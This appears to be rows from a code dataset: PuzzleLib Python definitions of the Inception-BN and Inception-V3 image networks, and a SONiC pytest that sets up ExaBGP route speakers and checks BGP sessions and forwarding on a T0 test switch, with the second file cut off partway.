block.append(BatchNorm2D(outmaps, inplace=bnInplace, name=names[1]))
block.append(Activation(relu, inplace=actInplace, name=names[2]))
return block
def pool2D(size, stride, pad, name):
if "max" in name:
return MaxPool2D(size, stride, pad)
elif "avg" in name:
return AvgPool2D(size, stride, pad)
else:
raise ValueError("Unrecognized pool type")
def tower(towername, names, maps, sizes, strides, pads, act, bn, scheme, typ="bn"):
block = Sequential()
lvlnames = ["%s_%s" % (towername, name) for name in names]
for i, name in enumerate(lvlnames):
if "pool" in name:
block.append(pool2D(sizes[i], strides[i], pads[i], name=names[i]))
else:
act = False if i == len(names) - 1 else act
block.extend(convBN(maps[i], maps[i+1], sizes[i], strides[i], pads[i], lvlnames[i], act, bn, scheme, typ))
return block
def bnBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme, b2size=3, b2pad=1, typ="bn"):
block = Sequential()
if typ == "bn":
b1towername, b1names = name, ["1x1"]
b2towername, b2names = name, ["3x3_reduce","3x3"]
b3towername, b3names = name, ["double_3x3_reduce", "double_3x3_0", "double_3x3_1"]
b4towername, b4names = name, ["avg_pool", "proj"]
elif typ == "v3":
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1"]
b3towername, b3names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2"]
b4towername, b4names = "%s_tower_2" % name, ["avg_pool", "conv"]
else:
raise ValueError("Unrecognized block type")
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1], strides=[1], pads=[0], act=act, bn=bn, scheme=scheme, typ=typ
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, b2size], strides=[1, 1], pads=[0, b2pad], act=act, bn=bn,
scheme=scheme, typ=typ
)
branch3 = tower(
b3towername, b3names, [inmaps] + b3m, [1, 3, 3], strides=[1, 1, 1], pads=[0, 1, 1], act=act, bn=bn,
scheme=scheme, typ=typ
)
branch4 = tower(
b4towername, b4names, [inmaps, inmaps] + b4m, [3, 1], strides=[1, 1], pads=[1, 0], act=act, bn=bn,
scheme=scheme, typ=typ
)
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def bnShrinkBlock(inmaps, b1m, b2m, name, act, bn, scheme, b1deep=True, pad=1, typ="bn"):
block = Sequential()
if typ == "bn":
if b1deep:
b1towername, b1names = name, ["3x3_reduce","3x3"]
else:
b1towername, b1names = name, ["3x3"]
b2towername, b2names = name, ["double_3x3_reduce", "double_3x3_0", "double_3x3_1"]
b3towername, b3names = name, ["max_pool"]
elif typ == "v3":
if b1deep:
b1towername, b1names = name, ["conv"]
else:
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1", "conv_2"]
b3towername, b3names = name, ["max_pool"]
else:
raise ValueError("Unrecognized block type")
if b1deep:
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1, 3], [1, 2], [0, pad], act=act, bn=bn, scheme=scheme, typ=typ
)
else:
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [3], [2], [pad], act=act, bn=bn, scheme=scheme, typ=typ
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, 3, 3], [1, 1, 2], [0, 1, pad], act=act, bn=bn, scheme=scheme, typ=typ
)
branch3 = tower(
b3towername, b3names, [inmaps, inmaps], [3], [2], [pad], act=act, bn=bn, scheme=scheme, typ=typ
)
block.append(Replicate(times=3))
block.append(Parallel().append(branch1).append(branch2).append(branch3))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def factorBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme):
block = Sequential()
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1", "conv_2"]
b3towername, b3names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2", "conv_3", "conv_4"]
b4towername, b4names = "%s_tower_2" % name, ["avg_pool", "conv"]
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, (1, 7), (7, 1)], [1, 1, 1], [0, (0, 3), (3, 0)], act=act, bn=bn,
scheme=scheme, typ="v3"
)
branch3 = tower(
b3towername, b3names, [inmaps] + b3m, [1, (7, 1), (1, 7), (7, 1), (1, 7)], [1, 1, 1, 1, 1],
[0, (3, 0), (0, 3), (3, 0), (0, 3)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch4 = tower(
b4towername, b4names, [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn, scheme=scheme, typ="v3"
)
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def v3ShrinkBlock(inmaps, b1m, b2m, name, act, bn, scheme):
block = Sequential()
b1towername, b1names = "%s_tower" % name, ["conv", "conv_1"]
b2towername, b2names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2", "conv_3"]
b3towername, b3names = name, ["max_pool"]
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1, 3], [1, 2], [0, 0], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, (1, 7), (7, 1), 3], [1, 1, 1, 2], [0, (0, 3), (3, 0), 0],
act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3 = tower(b3towername, b3names, [inmaps, inmaps], [3], [2], [0], act=act, bn=bn, scheme=scheme, typ="v3")
block.append(Replicate(times=3))
block.append(Parallel().append(branch1).append(branch2).append(branch3))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def expandBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme, pool="avg"):
block = Sequential()
b1towername, b1names = name, ["conv"]
b2towername, b2names, b2sub1names, b2sub2names = "%s_tower" % name, ["conv"], ["mixed_conv"], ["mixed_conv_1"]
b3towername,b3names,b3sub1names,b3sub2names = "%s_tower_1"%name, ["conv","conv_1"], ["mixed_conv"], ["mixed_conv_1"]
branch1 = tower(b1towername, b1names, [inmaps] + b1m, [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3")
branch2 = tower(b2towername, b2names, [inmaps, b2m[0]], [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3")
branch2sub1 = tower(
b2towername, b2sub1names, [b2m[0], b2m[1]], [(1, 3)], [1], [(0, 1)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2sub2 = tower(
b2towername, b2sub2names, [b2m[0], b2m[2]], [(3, 1)], [1], [(1, 0)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2.append(Replicate(times=2))
branch2.append(Parallel().append(branch2sub1).append(branch2sub2))
branch3 = tower(
b3towername, b3names, [inmaps, b3m[0], b3m[1]], [1, 3], [1, 1], [0, 1], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3sub1 = tower(
b3towername, b3sub1names, [b3m[1], b3m[2]], [(1, 3)], [1], [(0, 1)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3sub2 = tower(
b3towername, b3sub2names, [b3m[1], b3m[3]], [(3, 1)], [1], [(1, 0)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3.append(Replicate(times=2))
branch3.append(Parallel().append(branch3sub1).append(branch3sub2))
if pool == "avg":
branch4 = tower(
"%s_tower_2" % name, ["avg_pool", "conv"], [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn,
scheme=scheme, typ="v3"
)
elif pool == "max":
branch4 = tower(
"%s_tower_2" % name, ["max_pool", "conv"], [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn,
scheme=scheme, typ="v3"
)
else:
raise ValueError("Unrecognized block type")
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(ToList())
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def unittest():
bn = loadInceptionBN(None, initscheme="gaussian")
data = gpuarray.to_gpu(np.random.randn(1, 3, 224, 224).astype(np.float32))
bn(data)
del bn
gpuarray.memoryPool.freeHeld()
v3 = loadInceptionV3(None, initscheme="gaussian")
data = gpuarray.to_gpu(np.random.randn(1, 3, 299, 299).astype(np.float32))
v3(data)
del v3
gpuarray.memoryPool.freeHeld()
if __name__ == "__main__":
unittest() | Models/Nets/Inception.py | import numpy as np
from PuzzleLib.Backend import gpuarray
from PuzzleLib.Containers.Sequential import Sequential
from PuzzleLib.Containers.Parallel import Parallel
from PuzzleLib.Modules.Conv2D import Conv2D
from PuzzleLib.Modules.BatchNorm2D import BatchNorm2D
from PuzzleLib.Modules.Activation import Activation, relu
from PuzzleLib.Modules.MaxPool2D import MaxPool2D
from PuzzleLib.Modules.AvgPool2D import AvgPool2D
from PuzzleLib.Modules.Flatten import Flatten
from PuzzleLib.Modules.Linear import Linear
from PuzzleLib.Modules.SoftMax import SoftMax
from PuzzleLib.Modules.Replicate import Replicate
from PuzzleLib.Modules.Concat import Concat
from PuzzleLib.Modules.ToList import ToList
def loadInceptionBN(modelpath, actInplace=False, bnInplace=False, initscheme="none", name="Inception-BN-0126"):
net = Sequential(name=name)
net.append(Conv2D(3, 64, 7, stride=2, pad=3, useBias=False, initscheme=initscheme, name="conv_1"))
net.append(BatchNorm2D(64, inplace=bnInplace, name="bn_1"))
net.append(Activation(relu, inplace=actInplace, name="relu_1"))
net.append(MaxPool2D(3, 2, pad=1, name="pool_1"))
net.append(Conv2D(64, 64, 1, useBias=False, initscheme=initscheme, name="conv_2_red"))
net.append(BatchNorm2D(64, inplace=bnInplace, name="bn_2_red"))
net.append(Activation(relu, inplace=actInplace, name="relu_2_red"))
net.append(Conv2D(64, 192, 3, pad=1, useBias=False, initscheme=initscheme, name="conv_2"))
net.append(BatchNorm2D(192, inplace=bnInplace, name="bn_2"))
net.append(Activation(relu, inplace=actInplace, name="relu_2"))
net.append(MaxPool2D(3, 2, pad=1, name="pool_2"))
act, bn = actInplace, bnInplace
net.extend(bnBlock(192, [64], [64, 64], [64, 96, 96], [32], act=act, bn=bn, scheme=initscheme, name="3a"))
net.extend(bnBlock(256, [64], [64, 96], [64, 96, 96], [64], act=act, bn=bn, scheme=initscheme, name="3b"))
net.extend(bnShrinkBlock(320, [128, 160], [64, 96, 96], bn=bn, act=act, scheme=initscheme, name="3c"))
net.extend(bnBlock(576, [224], [64, 96], [96, 128, 128], [128], act=act, bn=bn, scheme=initscheme, name="4a"))
net.extend(bnBlock(576, [192], [96, 128], [96, 128, 128], [128], act=act, bn=bn, scheme=initscheme, name="4b"))
net.extend(bnBlock(576, [160], [128, 160], [128, 160, 160], [128], act=act,bn=bn, scheme=initscheme, name="4c"))
net.extend(bnBlock(608, [96], [128,192], [160, 192, 192], [128], act=act, bn=bn, scheme=initscheme, name="4d"))
net.extend(bnShrinkBlock(608, [128, 192], [192, 256, 256], act=act, bn=bn, scheme=initscheme, name="4e"))
net.extend(bnBlock(1056, [352], [192, 320], [160,224,224], [128], act=act, bn=bn, scheme=initscheme, name="5a"))
net.extend(bnBlock(1024, [352], [192, 320], [192,224,224], [128], act=act, bn=bn, scheme=initscheme, name="5b"))
net.append(AvgPool2D(7, 1, name="global_pool"))
net.append(Flatten(name="flatten"))
net.append(Linear(1024, 1000, initscheme=initscheme, name="fc1"))
net.append(SoftMax(name="softmax"))
if modelpath is not None:
net.load(modelpath, assumeUniqueNames=True)
return net
def loadInceptionV3(modelpath, actInplace=False, bnInplace=False, initscheme="none", name="Inception-7-0001"):
net = Sequential(name=name)
net.append(Conv2D(3, 32, 3, stride=2, useBias=False, initscheme=initscheme, name="conv_conv2d"))
net.append(BatchNorm2D(32, name="conv_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_relu"))
net.append(Conv2D(32, 32, 3, useBias=False, initscheme=initscheme, name="conv_1_conv2d"))
net.append(BatchNorm2D(32, name="conv_1_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_1_relu"))
net.append(Conv2D(32, 64, 3, pad=1, useBias=False, initscheme=initscheme, name="conv_2_conv2d"))
net.append(BatchNorm2D(64, name="conv_2_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_2_relu"))
net.append(MaxPool2D(3, 2, name="pool"))
net.append(Conv2D(64, 80, 1, useBias=False, initscheme=initscheme, name="conv_3_conv2d"))
net.append(BatchNorm2D(80, name="conv_3_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_3_relu"))
net.append(Conv2D(80, 192, 3, useBias=False, initscheme=initscheme, name="conv_4_conv2d"))
net.append(BatchNorm2D(192, name="conv_4_batchnorm"))
net.append(Activation(relu, inplace=actInplace, name="conv_4_relu"))
net.append(MaxPool2D(3, 2, name="pool1"))
act, bn = actInplace, bnInplace
net.extend(bnBlock(192, [64], [48, 64], [64, 96, 96], [32], "mixed", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnBlock(256, [64], [48, 64], [64, 96, 96], [64], "mixed_1", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnBlock(288, [64], [48, 64], [64, 96, 96], [64], "mixed_2", act, bn, initscheme, 5, 2, "v3"))
net.extend(bnShrinkBlock(288, [384], [64, 96, 96], "mixed_3", act, bn, initscheme, False, 0, "v3"))
net.extend(factorBlock(768, [192], [128, 128, 192], [128,128,128,128,192], [192], "mixed_4", act, bn, initscheme))
net.extend(factorBlock(768, [192], [160, 160, 192], [160,160,160,160,192], [192], "mixed_5", act, bn, initscheme))
net.extend(factorBlock(768, [192], [160, 160, 192], [160,160,160,160,192], [192], "mixed_6", act, bn, initscheme))
net.extend(factorBlock(768, [192], [192, 192, 192], [192,192,192,192,192], [192], "mixed_7", act, bn, initscheme))
net.extend(v3ShrinkBlock(768, [192, 320], [192, 192, 192, 192], "mixed_8", act, bn, initscheme))
net.extend(expandBlock(
1280, [320], [384, 384, 384], [448, 384, 384, 384], [192], "mixed_9", act, bn, initscheme, pool="avg"
))
net.extend(expandBlock(
2048, [320], [384, 384, 384], [448, 384, 384, 384], [192], "mixed_10", act, bn, initscheme, pool="max"
))
net.append(AvgPool2D(8, 1, name="global_pool"))
net.append(Flatten(name="flatten"))
net.append(Linear(2048, 1008, name="fc1"))
net.append(SoftMax(name="softmax"))
if modelpath is not None:
net.load(modelpath, assumeUniqueNames=True)
return net
def convBN(inmaps, outmaps, size, stride, pad, name, actInplace, bnInplace, scheme, typ="bn"):
block = Sequential()
if typ == "bn":
names = ["conv_%s" % name, "bn_%s" % name, "relu_%s" % name]
elif typ == "v3":
names = ["%s_conv2d" % name, "%s_batchnorm" % name, "%s_relu" % name]
else:
raise ValueError("Unrecognized convBN type")
block.append(Conv2D(inmaps, outmaps, size, stride, pad, useBias=False, initscheme=scheme, name=names[0]))
block.append(BatchNorm2D(outmaps, inplace=bnInplace, name=names[1]))
block.append(Activation(relu, inplace=actInplace, name=names[2]))
return block
def pool2D(size, stride, pad, name):
if "max" in name:
return MaxPool2D(size, stride, pad)
elif "avg" in name:
return AvgPool2D(size, stride, pad)
else:
raise ValueError("Unrecognized pool type")
def tower(towername, names, maps, sizes, strides, pads, act, bn, scheme, typ="bn"):
block = Sequential()
lvlnames = ["%s_%s" % (towername, name) for name in names]
for i, name in enumerate(lvlnames):
if "pool" in name:
block.append(pool2D(sizes[i], strides[i], pads[i], name=names[i]))
else:
act = False if i == len(names) - 1 else act
block.extend(convBN(maps[i], maps[i+1], sizes[i], strides[i], pads[i], lvlnames[i], act, bn, scheme, typ))
return block
def bnBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme, b2size=3, b2pad=1, typ="bn"):
block = Sequential()
if typ == "bn":
b1towername, b1names = name, ["1x1"]
b2towername, b2names = name, ["3x3_reduce","3x3"]
b3towername, b3names = name, ["double_3x3_reduce", "double_3x3_0", "double_3x3_1"]
b4towername, b4names = name, ["avg_pool", "proj"]
elif typ == "v3":
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1"]
b3towername, b3names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2"]
b4towername, b4names = "%s_tower_2" % name, ["avg_pool", "conv"]
else:
raise ValueError("Unrecognized block type")
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1], strides=[1], pads=[0], act=act, bn=bn, scheme=scheme, typ=typ
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, b2size], strides=[1, 1], pads=[0, b2pad], act=act, bn=bn,
scheme=scheme, typ=typ
)
branch3 = tower(
b3towername, b3names, [inmaps] + b3m, [1, 3, 3], strides=[1, 1, 1], pads=[0, 1, 1], act=act, bn=bn,
scheme=scheme, typ=typ
)
branch4 = tower(
b4towername, b4names, [inmaps, inmaps] + b4m, [3, 1], strides=[1, 1], pads=[1, 0], act=act, bn=bn,
scheme=scheme, typ=typ
)
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def bnShrinkBlock(inmaps, b1m, b2m, name, act, bn, scheme, b1deep=True, pad=1, typ="bn"):
block = Sequential()
if typ == "bn":
if b1deep:
b1towername, b1names = name, ["3x3_reduce","3x3"]
else:
b1towername, b1names = name, ["3x3"]
b2towername, b2names = name, ["double_3x3_reduce", "double_3x3_0", "double_3x3_1"]
b3towername, b3names = name, ["max_pool"]
elif typ == "v3":
if b1deep:
b1towername, b1names = name, ["conv"]
else:
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1", "conv_2"]
b3towername, b3names = name, ["max_pool"]
else:
raise ValueError("Unrecognized block type")
if b1deep:
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1, 3], [1, 2], [0, pad], act=act, bn=bn, scheme=scheme, typ=typ
)
else:
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [3], [2], [pad], act=act, bn=bn, scheme=scheme, typ=typ
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, 3, 3], [1, 1, 2], [0, 1, pad], act=act, bn=bn, scheme=scheme, typ=typ
)
branch3 = tower(
b3towername, b3names, [inmaps, inmaps], [3], [2], [pad], act=act, bn=bn, scheme=scheme, typ=typ
)
block.append(Replicate(times=3))
block.append(Parallel().append(branch1).append(branch2).append(branch3))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def factorBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme):
block = Sequential()
b1towername, b1names = name, ["conv"]
b2towername, b2names = "%s_tower" % name, ["conv", "conv_1", "conv_2"]
b3towername, b3names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2", "conv_3", "conv_4"]
b4towername, b4names = "%s_tower_2" % name, ["avg_pool", "conv"]
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, (1, 7), (7, 1)], [1, 1, 1], [0, (0, 3), (3, 0)], act=act, bn=bn,
scheme=scheme, typ="v3"
)
branch3 = tower(
b3towername, b3names, [inmaps] + b3m, [1, (7, 1), (1, 7), (7, 1), (1, 7)], [1, 1, 1, 1, 1],
[0, (3, 0), (0, 3), (3, 0), (0, 3)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch4 = tower(
b4towername, b4names, [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn, scheme=scheme, typ="v3"
)
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def v3ShrinkBlock(inmaps, b1m, b2m, name, act, bn, scheme):
block = Sequential()
b1towername, b1names = "%s_tower" % name, ["conv", "conv_1"]
b2towername, b2names = "%s_tower_1" % name, ["conv", "conv_1", "conv_2", "conv_3"]
b3towername, b3names = name, ["max_pool"]
branch1 = tower(
b1towername, b1names, [inmaps] + b1m, [1, 3], [1, 2], [0, 0], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2 = tower(
b2towername, b2names, [inmaps] + b2m, [1, (1, 7), (7, 1), 3], [1, 1, 1, 2], [0, (0, 3), (3, 0), 0],
act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3 = tower(b3towername, b3names, [inmaps, inmaps], [3], [2], [0], act=act, bn=bn, scheme=scheme, typ="v3")
block.append(Replicate(times=3))
block.append(Parallel().append(branch1).append(branch2).append(branch3))
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def expandBlock(inmaps, b1m, b2m, b3m, b4m, name, act, bn, scheme, pool="avg"):
block = Sequential()
b1towername, b1names = name, ["conv"]
b2towername, b2names, b2sub1names, b2sub2names = "%s_tower" % name, ["conv"], ["mixed_conv"], ["mixed_conv_1"]
b3towername,b3names,b3sub1names,b3sub2names = "%s_tower_1"%name, ["conv","conv_1"], ["mixed_conv"], ["mixed_conv_1"]
branch1 = tower(b1towername, b1names, [inmaps] + b1m, [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3")
branch2 = tower(b2towername, b2names, [inmaps, b2m[0]], [1], [1], [0], act=act, bn=bn, scheme=scheme, typ="v3")
branch2sub1 = tower(
b2towername, b2sub1names, [b2m[0], b2m[1]], [(1, 3)], [1], [(0, 1)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2sub2 = tower(
b2towername, b2sub2names, [b2m[0], b2m[2]], [(3, 1)], [1], [(1, 0)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch2.append(Replicate(times=2))
branch2.append(Parallel().append(branch2sub1).append(branch2sub2))
branch3 = tower(
b3towername, b3names, [inmaps, b3m[0], b3m[1]], [1, 3], [1, 1], [0, 1], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3sub1 = tower(
b3towername, b3sub1names, [b3m[1], b3m[2]], [(1, 3)], [1], [(0, 1)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3sub2 = tower(
b3towername, b3sub2names, [b3m[1], b3m[3]], [(3, 1)], [1], [(1, 0)], act=act, bn=bn, scheme=scheme, typ="v3"
)
branch3.append(Replicate(times=2))
branch3.append(Parallel().append(branch3sub1).append(branch3sub2))
if pool == "avg":
branch4 = tower(
"%s_tower_2" % name, ["avg_pool", "conv"], [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn,
scheme=scheme, typ="v3"
)
elif pool == "max":
branch4 = tower(
"%s_tower_2" % name, ["max_pool", "conv"], [inmaps, inmaps] + b4m, [3, 1], [1, 1], [1, 0], act=act, bn=bn,
scheme=scheme, typ="v3"
)
else:
raise ValueError("Unrecognized block type")
block.append(Replicate(times=4))
block.append(Parallel().append(branch1).append(branch2).append(branch3).append(branch4))
block.append(ToList())
block.append(Concat(axis=1, name="ch_concat_%s_chconcat" % name))
return block
def unittest():
bn = loadInceptionBN(None, initscheme="gaussian")
data = gpuarray.to_gpu(np.random.randn(1, 3, 224, 224).astype(np.float32))
bn(data)
del bn
gpuarray.memoryPool.freeHeld()
v3 = loadInceptionV3(None, initscheme="gaussian")
data = gpuarray.to_gpu(np.random.randn(1, 3, 299, 299).astype(np.float32))
v3(data)
del v3
gpuarray.memoryPool.freeHeld()
if __name__ == "__main__":
unittest() | 0.489259 | 0.316554 |
import pytest
from netaddr import *
import sys
import time
import ipaddress
from ansible_host import AnsibleHost
from ptf_runner import ptf_runner
def generate_ips(num, prefix, exclude_ips):
"""
Generate random ips within prefix
"""
prefix = IPNetwork(prefix)
exclude_ips.append(prefix.broadcast)
exclude_ips.append(prefix.network)
available_ips = list(prefix)
if len(available_ips) - len(exclude_ips)< num:
raise Exception("Not enough available IPs")
generated_ips = []
for available_ip in available_ips:
if available_ip not in exclude_ips:
generated_ips.append(IPNetwork(str(available_ip) + '/' + str(prefix.prefixlen)))
if len(generated_ips) == num:
break
return generated_ips
@pytest.mark.parametrize(
"ipv4, ipv6, mtu",
[ pytest.param(True, False, 1514), ],
)
def test_bgp_speaker(localhost, ansible_adhoc, testbed, ipv4, ipv6, mtu):
"""setup bgp speaker on T0 topology and verify routes advertised
by bgp speaker is received by T0 TOR
"""
hostname = testbed['dut']
ptf_hostname = testbed['ptf']
host = AnsibleHost(ansible_adhoc, hostname)
ptfhost = AnsibleHost(ansible_adhoc, ptf_hostname)
mg_facts = host.minigraph_facts(host=hostname)['ansible_facts']
host_facts = host.setup()['ansible_facts']
res = host.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
vlan_ips = generate_ips(3, \
"%s/%s" % (mg_facts['minigraph_vlan_interfaces'][0]['addr'], mg_facts['minigraph_vlan_interfaces'][0]['prefixlen']),
[IPAddress(mg_facts['minigraph_vlan_interfaces'][0]['addr'])])
# three speaker ips, two from peer range, another is vlan ip [0]
speaker_ips = generate_ips(2, mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0], [])
speaker_ips.append(vlan_ips[0])
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
host.command("ip route add %s/32 dev %s" % (ip.ip, mg_facts['minigraph_vlan_interfaces'][0]['attachto']))
root_dir = "/root"
exabgp_dir = "/root/exabgp"
helper_dir = "/root/helpers"
port_num = [5000, 6000, 7000]
cfnames = ["config_1.ini", "config_2.ini", "config_3.ini"]
vlan_ports = []
for i in range(0, 3):
vlan_ports.append(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][i]])
ptfhost.file(path=exabgp_dir, state="directory")
ptfhost.file(path=helper_dir, state="directory")
ptfhost.copy(src="bgp_speaker/dump.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/http_api.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/announce_routes.py", dest=helper_dir)
# deploy config file
extra_vars = \
{ 'helper_dir': helper_dir,
'exabgp_dir': exabgp_dir,
'lo_addr' : mg_facts['minigraph_lo_interfaces'][0]['addr'],
'lo_addr_prefixlen' : mg_facts['minigraph_lo_interfaces'][0]['prefixlen'],
'vlan_addr' : mg_facts['minigraph_vlan_interfaces'][0]['addr'],
'peer_range': mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0],
'announce_prefix': '10.10.10.0/26',
'minigraph_portchannels' : mg_facts['minigraph_portchannels'],
'minigraph_vlans' : mg_facts['minigraph_vlans'],
'minigraph_port_indices' : mg_facts['minigraph_port_indices'],
'peer_asn' : mg_facts['minigraph_bgp_asn'],
'peer_asn' : mg_facts['minigraph_bgp_asn'],
'my_asn' : bgp_speaker_asn,
'vlan_ports' : vlan_ports,
'port_num' : port_num,
'speaker_ips': [str(ip) for ip in speaker_ips],
'vlan_ips': [str(ip) for ip in vlan_ips],
'cfnames': cfnames }
for i in range(0, 3):
extra_vars.update({ 'cidx':i })
extra_vars.update({ 'speaker_ip': str(speaker_ips[i].ip) })
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, cfnames[i]))
# deploy routes
ptfhost.template(src="bgp_speaker/routes.j2", dest="%s/%s" % (exabgp_dir, "routes"))
# deploy start script
ptfhost.template(src="bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, "start.sh"), mode="u+rwx")
# kill exabgp
res = ptfhost.shell("pkill exabgp || true")
print res
# start exabgp instance
res = ptfhost.shell("bash %s/start.sh" % exabgp_dir)
print res
time.sleep(10)
# announce route
res = ptfhost.shell("nohup python %s/announce_routes.py %s/routes >/dev/null 2>&1 &" % (helper_dir, exabgp_dir))
print res
# make sure routes announced to dynamic bgp neighbors
time.sleep(60)
bgp_facts = host.bgp_facts()['ansible_facts']
# Verify bgp sessions are established
for k, v in bgp_facts['bgp_neighbors'].items():
assert v['state'] == 'established'
# Verify accepted prefixes of the dynamic neighbors are correct
for ip in speaker_ips:
assert bgp_facts['bgp_neighbors'][str(ip.ip)]['accepted prefixes'] == 1
assert bgp_facts['bgp_neighbors'][str(vlan_ips[0].ip)]['accepted prefixes'] == 1
# Generate route-port map information
ptfhost.template(src="bgp_speaker/bgp_speaker_route.j2", dest="/root/bgp_speaker_route.txt")
ptfhost.copy(src="ptftests", dest=root_dir)
ptf_runner(ptfhost, \
"ptftests",
"fib_test.FibTest",
platform_dir="ptftests",
params={"testbed_type": "t0",
"router_mac": host_facts['ansible_Ethernet0']['macaddress'],
"fib_info": "/root/bgp_speaker_route.txt",
"ipv4": ipv4,
"ipv6": ipv6,
"testbed_mtu": mtu },
log_file="/tmp/bgp_speaker_test.FibTest.log",
socket_recv_size=16384)
res = ptfhost.shell("pkill exabgp || true")
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
ptfhost.shell("ip addr flush dev eth{}".format(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][0]])) | tests/test_bgp_speaker.py | import pytest
from netaddr import *
import sys
import time
import ipaddress
from ansible_host import AnsibleHost
from ptf_runner import ptf_runner
def generate_ips(num, prefix, exclude_ips):
"""
Generate random ips within prefix
"""
prefix = IPNetwork(prefix)
exclude_ips.append(prefix.broadcast)
exclude_ips.append(prefix.network)
available_ips = list(prefix)
if len(available_ips) - len(exclude_ips)< num:
raise Exception("Not enough available IPs")
generated_ips = []
for available_ip in available_ips:
